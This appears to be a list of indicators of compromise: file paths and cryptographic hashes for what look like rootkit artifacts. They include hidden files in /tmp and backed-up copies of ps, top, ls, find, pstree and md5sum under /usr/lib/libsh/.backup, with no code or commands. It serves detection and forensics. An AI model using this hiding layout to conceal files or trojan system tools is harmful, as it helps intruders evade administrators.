SHA256 6967fa87b368f071c4e0d20a9b3adc3f74b756a7823036dd63d0e21375b5c2df
SHA512 b53670afd1edfe47a68f265204a9254565245458f06e462827d176ddfd9db4b913f4b966e41f6e39469b668d29248c2a9823de033edf827a6a3c68ec719c4500

/tmp/.shmd5

MD5 fc6210437e7b99a1a011420086f448aa
SHA1 4b497f01d530ad73a0528de71e051bf4053c0b25
SHA256 3428f7d5cb668efc10039df2ff8106e99195a3d85218a639d781c5d78fcace75
SHA512 aeb3750a0aca0278713b742125cd5314dc10259c50467bc57a1ec644c9d04d3ea5c593fe6ff2d6f778fdec5888d92f4d2125c27c82ae083447d74c15377d15f9

/tmp/.shmd5

MD5 d8d06c72332be09ec7c8a4e8c2529ff4
SHA1 bdf65d9438688b9463e2fa0f272c38b00065efee
SHA256 cb7f119919564a298c23a3624b87f2ffd5b1c27a1d3a904cf922e13ad535bda5
SHA512 bde07e1b19be556b137e33ef0ded9b6a616a0ea24f2ca9a1655ff92a508115e7a21f103d13d89092e385a59ee93d78a44ee1b2f2322940829d9aa5d759bde729

/tmp/.shmd5

MD5 5c72f1a08578d9ad6a26bb64c5d4824d
SHA1 88bf94980645d88fbd704ebe93bda300641bfe84
SHA256 2063622ad7615f0c20e117e5c96a12b874d04d6b989008d7c4fb2ced71204217
SHA512 49879f21e66710496c034ecad2d3787b003d1a4b547858be4dbe8792fa14071df8911891bd468b3c7ea6396165e30dad497459597678f0a888b4a042f75f8064

/usr/lib/libsh/.backup/ps

MD5 558edc26f8a38fa9788220b9af8a73e7
SHA1 3024d44e580e9c67f32f6c585d50e2a6cc9a7cac
SHA256 b76435c80333d2c1fd18e0e7682f1c9dfb5da8d507e93e3c416f54b481c428d5
SHA512 edaa425b441044f015e8f68fffa1664e42372d00dd0e7b0924d24ce947aa8e5f96b3bdc326fa2f8b978e3fcf638a1ceca45a223735db73f1607df66990feb56f

/usr/lib/libsh/.backup/top

MD5 daf2cfb715d205893e4f6854282dad18
SHA1 939708b9e10f46934e31f91c915be71c7c491e61
SHA256 29615b5441c4ebdd6bb1e7e3301aa5f4313b326ee009645cef443fb7bab3e1e0
SHA512 9d96f140cd561f35edab13e960031f1475acd5c93d8f85dc8636f207a929952e3da9cb19086d673274edf944501b5026769b086fff2b875af2bc331882e8217d

/usr/lib/libsh/.backup/ls

MD5 931606baaa7a2b4ef61198406f8fc3f4
SHA1 d3a21675a8f19518d8b8f3cef0f6a21de1da6cc7
SHA256 0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c
SHA512 4be40f2440619e990897cf956c32800dc96c2c983bf64519854a3309fa5aa21827991559f9c44595098e27e6f2ee4d64a3fdec6baba8a177881f20e3ec61e26c

/usr/lib/libsh/.backup/find

MD5 f11b2b59639b1edcb46026472786c747
SHA1 a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d
SHA256 189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a
SHA512 1967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b

/usr/lib/libsh/.backup/pstree

MD5 3dfdec02342af331dbaa70e8be88b988
SHA1 53810bd325c059930536467db0271fe41344dbdd
SHA256 3ebb6d41888a42802e43416e85fbece5f83bcf02dd1614d2933c766207c12a28
SHA512 909ca3af22ac9da7eb30f0a0929c6501f97d2188cb9257019e87222eba44dbf83b25735233b9b82bfa04b961761adad20bba4d394200caa00be0942e11183e5b

/usr/lib/libsh/.backup/md5sum

MD5 1f27bad424fa872edc3c2cfc50c4daa1
SHA1 0ca639850c9b1a9fc463c48d3229d9822fcc08fd
SHA256 331461536894ebf97e5d4115fc3ec4f33b207f3d2dde380adfdfc4edd8a258d2
SHA512 51c4e94f75da29867091ecada3fec0fd1c87b14b598323bad8ed52a9e0c5221de982a1ad99d272f92eb8fc43125c66227b937b3eb5f5ca621044ba70c607453c

/tmp/.procs

MD5 dbfab1026f0ecb2da80664aaaa4dc2df
SHA1 5f6ba72969e1537764225a7734dbe82803cab5ad
SHA256 5ffc23b653aca3456f8904805c49d763b4222af7b4d03b50d21f43bfcdc7a72f
SHA512 59110f203e31ec3a4a2d7c2ce9c7825cd4be49e176af02dbe75cb8d683cca324eeff132e9b61eac183cef73248115589bd8b02df9dc6f2418538464b26e48f14

/tmp/info_tmp

MD5 22ea01bf426fdae49b9b7cf004c6d4dd
SHA1 6131673bf21f62e30fc4cf309bcfa6f2f38ef0c5
SHA256 4c4a7bdb988f50b1955b22645128a7a689060d6e4cd69612b5c408728c65e6cf
SHA512 eeff1030deb87da71d05396e31a557b4b4318f7cd67e1660049b1502444dbacea928ceeeb3e6d453112d37780a1a3321b232dd291dcce50b6297cc478d70207a